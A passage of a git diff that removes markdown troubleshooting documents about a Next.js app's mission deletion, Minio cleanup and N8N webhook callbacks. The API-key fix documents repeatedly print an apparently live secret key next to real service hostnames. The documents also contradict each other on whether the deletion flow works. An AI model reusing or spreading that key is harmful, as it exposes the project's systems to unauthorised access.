success/failure status - -**External Integrations Cleaned Up**: -1. ✅ **Gitea Repository**: Deleted -2. ✅ **Leantime Project**: Closed -3. ✅ **Outline Collection**: Deleted -4. ✅ **RocketChat Channel**: Closed -5. ✅ **Penpot Project**: (if applicable) - -#### 2.6 Minio File Deletion (Lines 393-423) - -```typescript -// Step 2: Delete files from Minio AFTER N8N confirmation -// Delete logo if exists -if (mission.logo) { - try { - await deleteMissionLogo(params.missionId, mission.logo); - logger.debug('Logo deleted successfully from Minio'); - } catch (error) { - logger.error('Error deleting mission logo from Minio', { - error: error instanceof Error ? error.message : String(error), - missionId: params.missionId - }); - // Continue deletion even if logo deletion fails - } -} - -// Delete attachments from Minio -if (attachments.length > 0) { - logger.debug(`Deleting ${attachments.length} attachment(s) from Minio`); - for (const attachment of attachments) { - try { - await deleteMissionAttachment(attachment.filePath); - logger.debug('Attachment deleted successfully', { filename: attachment.filename }); - } catch (error) { - logger.error('Error deleting attachment from Minio', { - error: error instanceof Error ? error.message : String(error), - filename: attachment.filename - }); - // Continue deletion even if one attachment fails - } - } -} -``` - -**Status**: ✅ **Working correctly** - -**Implementation Details** (`lib/mission-uploads.ts`): - -**deleteMissionLogo()** (Lines 43-71): -```typescript -export async function deleteMissionLogo(missionId: string, logoPath: string): Promise { - const normalizedPath = ensureMissionsPrefix(logoPath); - const minioPath = normalizedPath.replace(/^missions\//, ''); - - try { - const { DeleteObjectCommand } = await import('@aws-sdk/client-s3'); - - const command = new DeleteObjectCommand({ - Bucket: 'missions', - Key: minioPath, - }); - - await s3Client.send(command); - - logger.debug('Mission logo deleted successfully', { minioPath }); - } catch (error) { - logger.error('Error deleting mission logo', { - error: error instanceof Error ? error.message : String(error), - missionId, - minioPath - }); - throw error; - } -} -``` - -**deleteMissionAttachment()** (Lines 74-100): -```typescript -export async function deleteMissionAttachment(filePath: string): Promise { - const normalizedPath = ensureMissionsPrefix(filePath); - const minioPath = normalizedPath.replace(/^missions\//, ''); - - try { - const { DeleteObjectCommand } = await import('@aws-sdk/client-s3'); - - const command = new DeleteObjectCommand({ - Bucket: 'missions', - Key: minioPath, - }); - - await s3Client.send(command); - - logger.debug('Mission attachment deleted successfully', { minioPath }); - } catch (error) { - logger.error('Error deleting mission attachment', { - error: error instanceof Error ? error.message : String(error), - minioPath - }); - throw error; - } -} -``` - -**Features**: -- ✅ **Properly implemented**: Uses AWS SDK DeleteObjectCommand -- ✅ **Path normalization**: Ensures correct Minio path format -- ✅ **Error handling**: Logs errors but continues deletion -- ✅ **Non-blocking**: File deletion failures don't stop mission deletion - -**Minio Configuration**: -- ✅ Bucket: `missions` -- ✅ Endpoint: `https://dome-api.slm-lab.net` -- ✅ Path structure: `missions/{missionId}/logo.{ext}` and `missions/{missionId}/attachments/{filename}` - -#### 2.7 Database Deletion (Lines 425-428) - -```typescript -// Step 3: Delete the mission from database (CASCADE will delete MissionUsers and Attachments) -await prisma.mission.delete({ - where: { id: params.missionId } -}); - -logger.debug('Mission deleted successfully from database', { missionId: params.missionId }); - -return NextResponse.json({ success: true }); -``` - -**Status**: ✅ **Working correctly** - -**Cascade Behavior** (from `prisma/schema.prisma`): - -```prisma -model Mission { - // ... - attachments Attachment[] - missionUsers MissionUser[] -} - -model Attachment { - mission Mission @relation(fields: [missionId], references: [id], onDelete: Cascade) - // ... -} - -model MissionUser { - mission Mission @relation(fields: [missionId], references: [id], onDelete: Cascade) - // ... -} -``` - -**What gets deleted automatically**: -- ✅ **MissionUsers**: All user assignments (guardians, volunteers) -- ✅ **Attachments**: All attachment records - -**What does NOT get deleted automatically**: -- ⚠️ **Minio files**: Must be deleted manually (handled in Step 2.6) -- ⚠️ **External integrations**: Must be cleaned via N8N (handled in Step 2.5) - ---- - -### Step 3: Prisma Cascade Deletion - -**File**: `prisma/schema.prisma` - -When `prisma.mission.delete()` is executed, Prisma automatically: - -1. **Deletes all MissionUsers** (line 173: `onDelete: Cascade`) - ```sql - DELETE FROM "MissionUser" WHERE "missionId" = 'mission-id'; - ``` - -2. **Deletes all Attachments** (line 159: `onDelete: Cascade`) - ```sql - DELETE FROM "Attachment" WHERE "missionId" = 'mission-id'; - ``` - -**Status**: ✅ **Working correctly** -- Cascade relationships properly configured -- Atomic operation: All or nothing - ---- - -### Step 4: External Integrations Cleanup - -**File**: `lib/services/n8n-service.ts` - -The N8N workflow (`triggerMissionDeletion`) handles cleanup of: - -1. ✅ **Gitea Repository**: Deleted via Gitea API -2. ✅ **Leantime Project**: Closed via Leantime API -3. ✅ **Outline Collection**: Deleted via Outline API -4. ✅ **RocketChat Channel**: Closed via RocketChat API -5. ✅ **Penpot Project**: (if applicable) - -**Status**: ✅ **Working correctly** -- Non-blocking: Mission deletion continues even if N8N fails -- Proper error logging -- Webhook URL: `https://brain.slm-lab.net/webhook-test/mission-delete` - ---- - -## ✅ Summary of Operations - -### Operations Performed Successfully - -1. ✅ **Frontend confirmation**: User confirmation dialog -2. ✅ **Authentication check**: NextAuth session validation -3. ✅ **Permission check**: Creator or admin only -4. ✅ **N8N workflow trigger**: External integrations cleanup -5. ✅ **Minio logo deletion**: Logo file removed from storage -6. ✅ **Minio attachments deletion**: All attachment files removed -7. ✅ **Database mission deletion**: Mission record deleted -8. ✅ **Cascade deletion**: MissionUsers and Attachments deleted automatically -9. ✅ **Success feedback**: Toast notification to user -10. ✅ **Redirect**: User redirected to missions list - -### Error Handling - -- ✅ **Non-blocking N8N**: Continues even if N8N workflow fails -- ✅ **Non-blocking file deletion**: Continues even if Minio deletion fails -- ✅ **Proper error logging**: All errors logged with context -- ✅ **User feedback**: Error toast shown to user on failure - ---- - -## 🔍 Potential Issues & Recommendations - -### 1. Frontend Confirmation Dialog - -**Current**: Uses native browser `confirm()` dialog - -**Recommendation**: Consider using a more sophisticated confirmation dialog: -```typescript -// Use AlertDialog component instead - - - - - - Supprimer la mission - - Êtes-vous sûr de vouloir supprimer cette mission ? - Cette action est irréversible et supprimera : - - La mission et toutes ses données - - Les fichiers associés - - Les intégrations externes (Gitea, Leantime, etc.) - - - Annuler - - Supprimer - - - - -``` - -**Priority**: Low (cosmetic improvement) - -### 2. Error Message Details - -**Current**: Generic error message "Impossible de supprimer la mission" - -**Recommendation**: Show more detailed error messages: -```typescript -catch (error) { - const errorData = await response.json().catch(() => ({})); - toast({ - title: "Erreur", - description: errorData.error || "Impossible de supprimer la mission", - variant: "destructive", - }); -} -``` - -**Priority**: Medium (better UX) - -### 3. Parallel File Deletion - -**Current**: Sequential deletion of attachments (for loop) - -**Recommendation**: Delete files in parallel for better performance: -```typescript -// Delete attachments in parallel -if (attachments.length > 0) { - await Promise.allSettled( - attachments.map(attachment => - deleteMissionAttachment(attachment.filePath).catch(error => { - logger.error('Error deleting attachment', { error, filename: attachment.filename }); - }) - ) - ); -} -``` - -**Priority**: Low (performance optimization) - -### 4. Transaction Safety - -**Current**: No transaction wrapper - if database deletion fails, files are already deleted - -**Recommendation**: Consider transaction approach (though Prisma doesn't support cross-database transactions): -```typescript -// Note: This is conceptual - Prisma doesn't support cross-database transactions -// But we could implement a rollback mechanism -try { - // Delete files - // Delete from database -} catch (error) { - // Rollback: Re-upload files? (Complex, probably not worth it) -} -``` - -**Priority**: Low (current approach is acceptable) - -### 5. N8N Webhook URL - -**Current**: Uses `-test` suffix: `https://brain.slm-lab.net/webhook-test/mission-delete` - -**Recommendation**: Verify if this should be production URL: -```typescript -const deleteWebhookUrl = process.env.N8N_DELETE_WEBHOOK_URL || - 'https://brain.slm-lab.net/webhook/mission-delete'; // Remove -test? -``` - -**Priority**: Medium (verify with team) - ---- - -## 📊 Testing Checklist - -### Manual Testing Steps - -1. ✅ **Test as Creator**: - - [ ] Create a mission - - [ ] Delete the mission as creator - - [ ] Verify mission is deleted - - [ ] Verify files are deleted from Minio - - [ ] Verify external integrations are cleaned up - -2. ✅ **Test as Admin**: - - [ ] Delete a mission created by another user - - [ ] Verify deletion works - -3. ✅ **Test as Non-Creator/Non-Admin**: - - [ ] Try to delete a mission (should fail with 403) - -4. ✅ **Test Error Scenarios**: - - [ ] Delete mission with logo (verify logo deleted) - - [ ] Delete mission with attachments (verify attachments deleted) - - [ ] Delete mission with external integrations (verify N8N called) - - [ ] Simulate N8N failure (verify mission still deleted) - -5. ✅ **Test Database Cascade**: - - [ ] Verify MissionUsers are deleted - - [ ] Verify Attachments are deleted - ---- - -## 🎯 Conclusion - -**Overall Status**: ✅ **FULLY FUNCTIONAL** - -The mission deletion flow is **completely implemented and working correctly**. All components are in place: - -- ✅ Frontend confirmation and API call -- ✅ Backend authentication and authorization -- ✅ N8N workflow for external integrations -- ✅ Minio file deletion (logo and attachments) -- ✅ Database deletion with cascade -- ✅ Proper error handling and logging - -The flow is **secure**, **robust**, and **well-structured**. Minor improvements could be made to the UX (better confirmation dialog, more detailed error messages), but the core functionality is solid. - ---- - -**Document Generated**: $(date) -**Last Reviewed**: $(date) -**Reviewed By**: Senior Developer Analysis - diff --git a/MISSION_DELETION_N8N_IDS_ISSUE_ANALYSIS.md b/MISSION_DELETION_N8N_IDS_ISSUE_ANALYSIS.md deleted file mode 100644 index b8f17a3..0000000 --- a/MISSION_DELETION_N8N_IDS_ISSUE_ANALYSIS.md +++ /dev/null @@ -1,604 +0,0 @@ -# Mission Deletion N8N IDs Issue - Complete Analysis - -## 🔍 Problem Statement - -When deleting a mission, the N8N deletion workflow is not working because the database does not contain the integration IDs (Leantime, Outline, Gitea, RocketChat). This prevents N8N from properly cleaning up external integrations. - ---- - -## 🔄 Current Flow Analysis - -### Mission Creation Flow - -``` -1. Frontend → POST /api/missions - ↓ -2. Backend creates mission in Prisma - ✅ Mission created with NULL integration IDs: - - leantimeProjectId: null - - outlineCollectionId: null - - giteaRepositoryUrl: null - - rocketChatChannelId: null - ↓ -3. Backend uploads files to Minio - ↓ -4. Backend triggers N8N workflow (async) - ✅ Sends missionId to N8N - ↓ -5. N8N creates external integrations: - - Gitea repository - - Leantime project - - Outline collection - - RocketChat channel - ↓ -6. N8N should call → POST /api/missions/mission-created - ⚠️ PROBLEM: This callback may fail or not be called - ↓ -7. Backend should save IDs to database - ❌ If step 6 fails, IDs are never saved -``` - -### Mission Deletion Flow - -``` -1. Frontend → DELETE /api/missions/[missionId] - ↓ -2. Backend reads mission from database - ❌ Integration IDs are NULL (if step 6 above failed) - ↓ -3. Backend prepares deletion data for N8N: - { - repoName: "", // Empty because giteaRepositoryUrl is null - leantimeProjectId: 0, // 0 because leantimeProjectId is null - documentationCollectionId: "", // Empty because outlineCollectionId is null - rocketchatChannelId: "" // Empty because rocketChatChannelId is null - } - ↓ -4. Backend sends to N8N deletion workflow - ❌ N8N receives empty IDs and cannot delete integrations - ↓ -5. N8N fails to clean up external resources -``` - ---- - -## 📋 Code Analysis - -### 1. Mission Creation - Saving IDs - -**File**: `app/api/missions/route.ts` - -**Lines 260-262**: Mission is created WITHOUT integration IDs -```typescript -const mission = await prisma.mission.create({ - data: missionData // No integration IDs here -}); -``` - -**Lines 413-423**: N8N is triggered with missionId -```typescript -const n8nData = { - ...body, - missionId: mission.id, // ✅ missionId is sent to N8N - creatorId: userId, - logoPath: logoPath, - logoUrl: logoUrl, - config: { - N8N_API_KEY: process.env.N8N_API_KEY, - MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL - } -}; - -const workflowResult = await n8nService.triggerMissionCreation(n8nData); -``` - -**Issue**: The API returns success immediately without waiting for N8N to save the IDs. - -### 2. N8N Callback Endpoint - -**File**: `app/api/missions/mission-created/route.ts` - -**Lines 64-69**: Endpoint prefers `missionId` over `name + creatorId` -```typescript -if (body.missionId) { - // ✅ Use missionId if provided (more reliable) - logger.debug('Looking up mission by ID', { missionId: body.missionId }); - mission = await prisma.mission.findUnique({ - where: { id: body.missionId } - }); -} -``` - -**Lines 128-150**: Maps N8N fields to Prisma fields -```typescript -// Mapper les champs N8N vers notre schéma Prisma -if (body.gitRepoUrl !== undefined) { - updateData.giteaRepositoryUrl = body.gitRepoUrl || null; -} - -if (body.leantimeProjectId !== undefined) { - updateData.leantimeProjectId = body.leantimeProjectId - ? String(body.leantimeProjectId) - : null; -} - -if (body.documentationCollectionId !== undefined) { - updateData.outlineCollectionId = body.documentationCollectionId || null; -} - -if (body.rocketchatChannelId !== undefined) { - updateData.rocketChatChannelId = body.rocketchatChannelId || null; -} -``` - -**Status**: ✅ Endpoint exists and should work correctly - -### 3. Mission Deletion - Reading IDs - -**File**: `app/api/missions/[missionId]/route.ts` - -**Lines 302-311**: Mission is fetched from database -```typescript -const mission = await prisma.mission.findUnique({ - where: { id: params.missionId }, - include: { - missionUsers: { - include: { - user: true - } - } - } -}); -``` - -**Lines 356-372**: Deletion data is prepared -```typescript -const n8nDeletionData = { - missionId: mission.id, - name: mission.name, - repoName: repoName, // Extracted from giteaRepositoryUrl (may be empty) - leantimeProjectId: mission.leantimeProjectId || 0, // ❌ 0 if null - documentationCollectionId: mission.outlineCollectionId || '', // ❌ Empty if null - rocketchatChannelId: mission.rocketChatChannelId || '', // ❌ Empty if null - // ... -}; -``` - -**Problem**: If IDs are null in database, N8N receives empty values. - ---- - -## 🔍 Root Cause Analysis - -### Possible Causes - -1. **N8N Workflow Not Calling `/mission-created`** - - N8N workflow might not be configured to call the callback endpoint - - The "Save Mission To API" node might be missing or misconfigured - - Network issues preventing the callback - -2. **N8N Callback Failing** - - API key mismatch - - Mission lookup failing (name/creatorId mismatch) - - Network timeout - - Server error - -3. **Timing Issues** - - N8N workflow takes time to complete - - User deletes mission before N8N saves IDs - - Race condition - -4. **N8N Not Sending `missionId`** - - N8N might only send `name + creatorId` - - If mission name is not unique, lookup fails - ---- - -## ✅ Verification Steps - -### Step 1: Check if IDs are being saved - -**Query the database**: -```sql -SELECT - id, - name, - giteaRepositoryUrl, - leantimeProjectId, - outlineCollectionId, - rocketChatChannelId, - createdAt -FROM "Mission" -WHERE createdAt > NOW() - INTERVAL '7 days' -ORDER BY createdAt DESC; -``` - -**Expected**: Recent missions should have integration IDs populated. - -**If NULL**: N8N callback is not working. - -### Step 2: Check N8N Workflow Configuration - -**Verify N8N workflow has "Save Mission To API" node**: -- Node should POST to: `{{ MISSION_API_URL }}/mission-created` -- Should include `missionId` in body -- Should include `x-api-key` header -- Should include integration IDs in body - -**Expected format**: -```json -{ - "missionId": "uuid-here", - "name": "Mission Name", - "creatorId": "user-id", - "gitRepoUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-id", - "rocketchatChannelId": "channel-id" -} -``` - -### Step 3: Check Server Logs - -**Look for**: -``` -Mission Created Webhook Received -Received mission-created data: { ... } -Found mission: { id: "...", name: "..." } -Updating giteaRepositoryUrl: ... -Mission updated successfully -``` - -**If missing**: N8N is not calling the endpoint. - -### Step 4: Test N8N Callback Manually - -**Send test request**: -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "existing-mission-id", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test-repo", - "leantimeProjectId": "999", - "documentationCollectionId": "test-collection", - "rocketchatChannelId": "test-channel" - }' -``` - -**Expected**: 200 OK with updated mission data. - ---- - -## 🔧 Solutions - -### Solution 1: Verify N8N Workflow Configuration (IMMEDIATE) - -**Check N8N workflow "Save Mission To API" node**: - -1. **URL should be**: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/mission-created - ``` - Or hardcoded: - ``` - https://hub.slm-lab.net/api/missions/mission-created - ``` - -2. **Headers should include**: - ``` - Content-Type: application/json - x-api-key: {{ $node['Process Mission Data'].json.config.N8N_API_KEY }} - ``` - -3. **Body should include**: - - ✅ `missionId` (from original request) - - ✅ `gitRepoUrl` (from Git repository creation) - - ✅ `leantimeProjectId` (from Leantime project creation) - - ✅ `documentationCollectionId` (from Outline collection creation) - - ✅ `rocketchatChannelId` (from RocketChat channel creation) - -4. **Verify node execution**: - - Check N8N execution logs - - Verify node is not set to "continueOnFail" - - Check for errors in node execution - -### Solution 2: Add Logging to Track Callback (DEBUGGING) - -**Add more detailed logging** in `app/api/missions/mission-created/route.ts`: - -```typescript -logger.debug('Mission Created Webhook Received', { - headers: { - hasApiKey: !!request.headers.get('x-api-key'), - contentType: request.headers.get('content-type') - } -}); - -const body = await request.json(); -logger.debug('Received mission-created data', { - missionId: body.missionId, - name: body.name, - creatorId: body.creatorId, - hasGitRepoUrl: !!body.gitRepoUrl, - hasLeantimeProjectId: !!body.leantimeProjectId, - hasDocumentationCollectionId: !!body.documentationCollectionId, - hasRocketchatChannelId: !!body.rocketchatChannelId, - fullBody: body // Log full body for debugging -}); -``` - -### Solution 3: Add Fallback Lookup (ROBUSTNESS) - -**Improve mission lookup** in `app/api/missions/mission-created/route.ts`: - -```typescript -// Try missionId first -if (body.missionId) { - mission = await prisma.mission.findUnique({ - where: { id: body.missionId } - }); - - if (!mission) { - logger.warn('Mission not found by ID, trying name + creatorId', { - missionId: body.missionId - }); - } -} - -// Fallback to name + creatorId -if (!mission && body.name && body.creatorId) { - mission = await prisma.mission.findFirst({ - where: { - name: body.name, - creatorId: body.creatorId - }, - orderBy: { createdAt: 'desc' } - }); -} - -// If still not found, try just by name (last resort) -if (!mission && body.name) { - logger.warn('Mission not found by name + creatorId, trying just name', { - name: body.name, - creatorId: body.creatorId - }); - mission = await prisma.mission.findFirst({ - where: { name: body.name }, - orderBy: { createdAt: 'desc' } - }); -} -``` - -### Solution 4: Add Retry Mechanism (RELIABILITY) - -**Add retry logic** for N8N callback (if N8N supports it): - -- Configure N8N to retry failed callbacks -- Or implement a webhook retry queue - -### Solution 5: Manual ID Update Script (MIGRATION) - -**Create a script** to manually update existing missions: - -```typescript -// scripts/update-mission-ids.ts -import { prisma } from '@/lib/prisma'; - -async function updateMissionIds() { - // Get missions without IDs - const missions = await prisma.mission.findMany({ - where: { - OR: [ - { giteaRepositoryUrl: null }, - { leantimeProjectId: null }, - { outlineCollectionId: null }, - { rocketChatChannelId: null } - ] - } - }); - - for (const mission of missions) { - // Manually update IDs if you know them - // Or query external services to find them - await prisma.mission.update({ - where: { id: mission.id }, - data: { - giteaRepositoryUrl: '...', // From Gitea - leantimeProjectId: '...', // From Leantime - outlineCollectionId: '...', // From Outline - rocketChatChannelId: '...' // From RocketChat - } - }); - } -} -``` - ---- - -## 🧪 Testing Plan - -### Test 1: Create Mission and Verify IDs Saved - -1. Create a new mission via frontend -2. Wait 30-60 seconds for N8N to complete -3. Query database to verify IDs are saved: - ```sql - SELECT * FROM "Mission" WHERE name = 'Test Mission'; - ``` -4. **Expected**: All integration IDs should be populated - -### Test 2: Check N8N Execution Logs - -1. Go to N8N execution history -2. Find the latest mission creation execution -3. Check "Save Mission To API" node: - - ✅ Node executed successfully - - ✅ Response is 200 OK - - ✅ Body contains integration IDs - -### Test 3: Test Deletion with IDs - -1. Delete a mission that has IDs saved -2. Check N8N deletion workflow execution -3. **Expected**: N8N should receive non-empty IDs and successfully delete integrations - -### Test 4: Test Deletion without IDs - -1. Delete a mission that has NULL IDs -2. Check N8N deletion workflow execution -3. **Expected**: N8N receives empty IDs and logs warning (but mission still deleted) - ---- - -## 📊 Expected vs Actual Behavior - -### Expected Behavior - -**Mission Creation**: -1. Mission created in database -2. N8N workflow triggered -3. N8N creates integrations -4. N8N calls `/mission-created` with IDs -5. IDs saved to database ✅ - -**Mission Deletion**: -1. Mission fetched from database (with IDs) ✅ -2. IDs sent to N8N deletion workflow ✅ -3. N8N deletes integrations ✅ -4. Mission deleted from database ✅ - -### Actual Behavior (Current Issue) - -**Mission Creation**: -1. Mission created in database ✅ -2. N8N workflow triggered ✅ -3. N8N creates integrations ✅ -4. N8N calls `/mission-created` ❓ (May fail) -5. IDs saved to database ❌ (If step 4 fails) - -**Mission Deletion**: -1. Mission fetched from database (IDs are NULL) ❌ -2. Empty IDs sent to N8N deletion workflow ❌ -3. N8N cannot delete integrations ❌ -4. Mission deleted from database ✅ (But integrations remain) - ---- - -## 🎯 Immediate Action Items - -1. **✅ Verify N8N Workflow Configuration** - - Check "Save Mission To API" node exists - - Verify URL, headers, and body format - - Check execution logs for errors - -2. **✅ Check Server Logs** - - Look for `/mission-created` endpoint calls - - Check for errors or missing API key - - Verify mission lookup is working - -3. **✅ Test Manually** - - Create a test mission - - Wait for N8N to complete - - Check database for IDs - - If missing, manually test the callback endpoint - -4. **✅ Fix N8N Workflow (if needed)** - - Ensure `missionId` is included in callback - - Verify all integration IDs are included - - Test the workflow end-to-end - -5. **✅ Update Existing Missions (if needed)** - - Manually update IDs for critical missions - - Or create migration script - ---- - -## 📝 Code Changes Needed - -### No Code Changes Required (if N8N is configured correctly) - -The endpoint `/api/missions/mission-created` already exists and should work. The issue is likely: -- N8N workflow not calling it -- N8N workflow calling it incorrectly -- Network/authentication issues - -### Optional Improvements - -1. **Better error handling** in `/mission-created` endpoint -2. **Retry mechanism** for failed callbacks -3. **Monitoring/alerting** when IDs are not saved -4. **Migration script** for existing missions - ---- - -## 🔍 Debugging Commands - -### Check Recent Missions Without IDs - -```sql -SELECT - id, - name, - createdAt, - CASE WHEN giteaRepositoryUrl IS NULL THEN 'MISSING' ELSE 'OK' END as gitea, - CASE WHEN leantimeProjectId IS NULL THEN 'MISSING' ELSE 'OK' END as leantime, - CASE WHEN outlineCollectionId IS NULL THEN 'MISSING' ELSE 'OK' END as outline, - CASE WHEN rocketChatChannelId IS NULL THEN 'MISSING' ELSE 'OK' END as rocketchat -FROM "Mission" -WHERE createdAt > NOW() - INTERVAL '7 days' -ORDER BY createdAt DESC; -``` - -### Check Mission with IDs - -```sql -SELECT - id, - name, - giteaRepositoryUrl, - leantimeProjectId, - outlineCollectionId, - rocketChatChannelId -FROM "Mission" -WHERE id = 'your-mission-id'; -``` - -### Test Callback Endpoint - -```bash -# Replace with actual values -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "mission-uuid-here", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-456", - "rocketchatChannelId": "channel-789" - }' -``` - ---- - -## ✅ Conclusion - -**Root Cause**: N8N workflow is likely not calling `/api/missions/mission-created` endpoint, or the callback is failing silently. - -**Solution**: -1. Verify N8N workflow configuration -2. Check N8N execution logs -3. Test callback endpoint manually -4. Fix N8N workflow if needed -5. Manually update existing missions if necessary - -**Status**: Endpoint exists and should work. Issue is in N8N workflow configuration or execution. - ---- - -**Document Created**: $(date) -**Last Updated**: $(date) -**Priority**: HIGH - Blocks proper mission deletion - diff --git a/N8N_API_KEY_MISMATCH_FIX.md b/N8N_API_KEY_MISMATCH_FIX.md deleted file mode 100644 index d63e8a2..0000000 --- a/N8N_API_KEY_MISMATCH_FIX.md +++ /dev/null @@ -1,260 +0,0 @@ -# N8N API Key Mismatch - 401 Unauthorized - -## 🔍 Problem Identified - -**Error**: `401 - "Unauthorized"` -**Log**: `Invalid API key { received: 'present', expected: 'configured' }` - -**Status**: -- ✅ Endpoint is being called (`Mission Created Webhook Received`) -- ✅ API key is being sent (`received: 'present'`) -- ❌ **API key values don't match** - ---- - -## 🔍 Root Cause - -The API key sent by N8N in the `x-api-key` header **does not match** the `N8N_API_KEY` environment variable on the server. - -### How It Works - -1. **Server sends to N8N** (line 420 in `app/api/missions/route.ts`): - ```typescript - config: { - N8N_API_KEY: process.env.N8N_API_KEY, // From server environment - MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL - } - ``` - -2. **N8N uses this value** in "Save Mission To API" node: - ``` - x-api-key: {{ $node['Process Mission Data'].json.config.N8N_API_KEY }} - ``` - -3. **Server receives and validates** (line 42 in `app/api/missions/mission-created/route.ts`): - ```typescript - if (apiKey !== expectedApiKey) { - // Keys don't match → 401 error - } - ``` - -### The Problem - -**If `process.env.N8N_API_KEY` is `undefined` or empty** when sending to N8N: -- N8N receives `undefined` or empty string -- N8N sends empty string in header -- Server expects the actual key value -- **Keys don't match → 401 error** - ---- - -## ✅ Solution - -### Step 1: Verify N8N_API_KEY is Set - -**Check your environment variables**: - -```bash -# In your terminal (if running locally) -echo $N8N_API_KEY - -# Or check in your application -# Create a test endpoint to verify -``` - -**Expected**: Should show the actual API key value (not empty) - -### Step 2: Ensure Same Key in Both Places - -**The key must be the same in**: - -1. **Server environment variable**: `N8N_API_KEY=your-key-here` -2. **N8N workflow config**: The value sent in `config.N8N_API_KEY` - -**If they're different**, they won't match! - -### Step 3: Check What N8N is Sending - -**In N8N workflow "Save Mission To API" node**, verify: - -1. **Header `x-api-key` value**: - ``` - {{ $node['Process Mission Data'].json.config.N8N_API_KEY }} - ``` - -2. **What this resolves to**: - - If `config.N8N_API_KEY` is `undefined` → N8N sends empty string - - If `config.N8N_API_KEY` has a value → N8N sends that value - -3. **Check N8N execution logs**: - - Look at the actual request being sent - - Check the `x-api-key` header value - - Compare with your server's `N8N_API_KEY` - -### Step 4: Fix the Mismatch - -**Option A: If server's N8N_API_KEY is undefined** - -Add to `.env.local` (or production environment): -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -Restart the application. - -**Option B: If N8N is sending wrong value** - -Check what value N8N has in `config.N8N_API_KEY`: -- It should match the server's `N8N_API_KEY` -- If different, update one to match the other - -**Option C: Hardcode in N8N (not recommended)** - -If you can't sync the values, you could hardcode in N8N: -``` -x-api-key: LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -But this is less secure - better to use environment variable. - ---- - -## 🧪 Testing - -### Test 1: Check Server Environment - -**Create test endpoint**: -```typescript -// app/api/test-n8n-key/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - keyLength: process.env.N8N_API_KEY?.length || 0, - keyPrefix: process.env.N8N_API_KEY ? process.env.N8N_API_KEY.substring(0, 4) + '...' : 'none' - }); -} -``` - -**Visit**: `http://localhost:3000/api/test-n8n-key` - -**Expected**: -```json -{ - "hasN8NApiKey": true, - "keyLength": 32, - "keyPrefix": "Lwge..." -} -``` - -### Test 2: Check What N8N Sends - -**In N8N execution logs**, check the "Save Mission To API" node: -- Look at the request headers -- Find `x-api-key` header -- Note the value - -**Compare** with server's `N8N_API_KEY` - they must match exactly. - -### Test 3: Manual Test - -**Test the endpoint with the correct key**: -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" \ - -d '{ - "missionId": "test-id", - "name": "Test", - "creatorId": "user-id" - }' -``` - -**Expected**: 200 OK (if mission exists) or 404 (if mission doesn't exist) - -**If 401**: The key in the curl command doesn't match server's `N8N_API_KEY` - ---- - -## 🔧 Common Issues - -### Issue 1: Key is undefined when sending to N8N - -**Symptom**: N8N receives `undefined` or empty string in `config.N8N_API_KEY` - -**Cause**: `process.env.N8N_API_KEY` is not set when creating mission - -**Fix**: Add `N8N_API_KEY` to environment and restart - -### Issue 2: Different keys in different environments - -**Symptom**: Works in development but not production (or vice versa) - -**Cause**: Different `N8N_API_KEY` values in different environments - -**Fix**: Use the same key in all environments, or update N8N to use environment-specific keys - -### Issue 3: Key has extra spaces or characters - -**Symptom**: Keys look the same but don't match - -**Cause**: Extra spaces, newlines, or special characters - -**Fix**: -```env -# Correct -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 - -# Wrong (with quotes) -N8N_API_KEY="LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" - -# Wrong (with spaces) -N8N_API_KEY = LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - ---- - -## 📋 Debugging Checklist - -- [ ] `N8N_API_KEY` is set in server environment -- [ ] Key value matches what N8N is sending -- [ ] No extra spaces or characters in key -- [ ] Server has been restarted after adding key -- [ ] Test endpoint shows key is loaded -- [ ] N8N execution logs show correct key in header -- [ ] Manual curl test works with the key - ---- - -## 🎯 Expected Flow After Fix - -1. **Mission created** ✅ -2. **N8N workflow triggered** ✅ -3. **Server sends `config.N8N_API_KEY` to N8N** ✅ -4. **N8N creates integrations** ✅ -5. **N8N calls `/api/missions/mission-created`** ✅ -6. **N8N sends `x-api-key` header with same value** ✅ -7. **Server validates key matches** ✅ -8. **IDs saved to database** ✅ - ---- - -## 📝 Summary - -**Problem**: 401 Unauthorized - API key mismatch - -**Root Cause**: The API key sent by N8N doesn't match the server's `N8N_API_KEY` - -**Solution**: -1. Ensure `N8N_API_KEY` is set in server environment -2. Ensure N8N uses the same key value -3. Verify keys match exactly (no spaces, same value) - -**After Fix**: The endpoint should return 200 OK and save integration IDs. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks integration IDs from being saved - diff --git a/N8N_API_KEY_MISSING_FIX.md b/N8N_API_KEY_MISSING_FIX.md deleted file mode 100644 index 74b8732..0000000 --- a/N8N_API_KEY_MISSING_FIX.md +++ /dev/null @@ -1,245 +0,0 @@ -# N8N_API_KEY Missing - Server Configuration Error - -## 🔍 Problem Identified - -**Error**: `500 - "Server configuration error"` - -**Cause**: `N8N_API_KEY` is **NOT set** in the server's environment variables. - ---- - -## ✅ Solution: Add N8N_API_KEY to Environment Variables - -### The Error - -Looking at `app/api/missions/mission-created/route.ts` (lines 34-39): - -```typescript -if (!expectedApiKey) { - logger.error('N8N_API_KEY not configured in environment'); - return NextResponse.json( - { error: 'Server configuration error' }, - { status: 500 } - ); -} -``` - -**This error means**: `process.env.N8N_API_KEY` is `undefined` or empty. - ---- - -## 🔧 How 